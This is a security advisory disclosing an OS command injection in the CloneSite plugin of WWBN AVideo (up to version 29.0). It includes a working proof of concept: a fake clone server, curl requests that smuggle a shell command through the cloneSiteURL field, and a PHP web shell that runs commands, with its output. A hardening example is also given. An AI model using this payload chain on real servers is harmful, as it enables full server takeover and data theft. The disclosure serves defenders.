8.7
CloneSite Plugin Allows Remote Code Execution in WWBN AVideo
GHSA-xr6f-h4x7-r6qp
Summary
The CloneSite plugin in WWBN AVideo contains a vulnerability that allows an attacker to inject malicious commands, potentially leading to remote code execution on the server. This could allow an attacker to access and modify sensitive data or take control of the server. To protect against this vulnerability, update the CloneSite plugin to the latest version or remove it if not necessary.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| composer | wwbn | avideo | <= 29.0 |
Original title
WWBN AVideo: RCE cause by clonesite plugin
Original description
Description
## Summary
The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.
## Details
Line 112 of `plugin/CloneSite/cloneClient.json.php` does not sanitize the value properly:
```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```
The `str_replace` call removes the `'` characters that `escapeshellarg` adds, so the value is no longer quoted and an attacker-controlled `cloneSiteURL` can inject shell commands, leading to RCE:
```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; // line 116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; // line 117
exec($cmd . " 2>&1", $output, $return_val); // line 119
```
The attack flow:
1. Set up a malicious site that serves the clone data.
2. Set the malicious URL through `objects/pluginAddDataObject.json.php`.
3. Access `plugin/CloneSite/cloneClient.json.php` to trigger the RCE.
## PoC
Set up the malicious site with Python, for example:
```python
from flask import Flask, jsonify, request

app = Flask(__name__)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    print("PATH:", path)
    return jsonify({
        "error": False,
        "msg": "",
        "url": "http://target-site.com/",
        "key": "target_clone_key",
        "useRsync": 0,
        "videosDir": "/var/www/html/AVideo/videos/",
        "sqlFile": "Clone_mysqlDump_evil123.sql",
        "videoFiles": [],
        "photoFiles": []
    })


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8071)
```
Change the URL to a payload like the following (requires admin):
```shell
curl -b 'PHPSESSID=<admin_session>' \
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
-H "Content-Type: application/json" \
-d '{
"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
"cloneSiteSSHIP":"127.0.0.1",
"cloneSiteSSHUser":"1",
"cloneSiteSSHPort":"22",
"cloneSiteSSHPassword":{
"type":"encrypted",
"value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
},
"useRsync":true,
"MaintenanceMode":false,
"myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
# the request above stores the malicious cloneSiteURL
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" # trigger the RCE, which writes 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php" \
-d '1=id'
#uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
This payload creates a web shell: once `plugin/CloneSite/cloneClient.json.php` is accessed, `1.php` is created.
## Impact
- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
## Recommended Fix
Apply stronger sanitization to `$objClone->cloneSiteURL`.
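The quote-stripping pattern from the Details section next to one hardened form, as an added example (not AVideo's code and not the project's fix). The function names, the `/tmp/clone.sql` path and the sample URLs are hypothetical; the script only builds and prints command strings and executes nothing.

```php
<?php
// Added illustration; function names and sample values are hypothetical, not AVideo code.

// Mirrors the pattern quoted from cloneClient.json.php: the quotes that
// escapeshellarg() adds are stripped again, so the value reaches the shell bare.
function buildCmdVulnerable(string $cloneSiteURL, string $localFile, string $remoteName): string
{
    $url = str_replace("'", '', escapeshellarg($cloneSiteURL));
    $sqlURL = "{$url}videos/clones/{$remoteName}";
    return "wget -O {$localFile} {$sqlURL}";
}

// Hardened: validate each untrusted part, then quote every complete argument once.
function buildCmdHardened(string $cloneSiteURL, string $localFile, string $remoteName): ?string
{
    // Allow-list: http(s) scheme, plain host, optional port, conservative path characters.
    if (!preg_match('#^https?://[A-Za-z0-9.-]+(:\d{1,5})?/([A-Za-z0-9._~-]+/)*$#', $cloneSiteURL)) {
        return null;
    }
    // The dump name comes from the remote JSON response, so it is untrusted as well.
    if (!preg_match('/^[A-Za-z0-9_-]+\.sql$/', $remoteName)) {
        return null;
    }
    $sqlURL = $cloneSiteURL . 'videos/clones/' . $remoteName;
    // The quotes stay in place, so the shell sees exactly one word per argument.
    return 'wget -O ' . escapeshellarg($localFile) . ' ' . escapeshellarg($sqlURL);
}

// Constructed sample inputs (";id;" is a harmless marker for an injected command).
$samples = [
    'http://clone.example/',
    'http://clone.example/;id;/',
];
foreach ($samples as $url) {
    echo "input:      {$url}\n";
    echo "vulnerable: " . buildCmdVulnerable($url, '/tmp/clone.sql', 'Clone_mysqlDump_test.sql') . "\n";
    $safe = buildCmdHardened($url, '/tmp/clone.sql', 'Clone_mysqlDump_test.sql');
    echo "hardened:   " . ($safe ?? 'rejected') . "\n\n";
}
```

For the second input the vulnerable builder prints a string the shell would split at each `;`, while the hardened builder rejects it before any quoting is needed.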
ghsa CVSS4.0
8.7
Vulnerability type
CWE-78
OS Command Injection
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026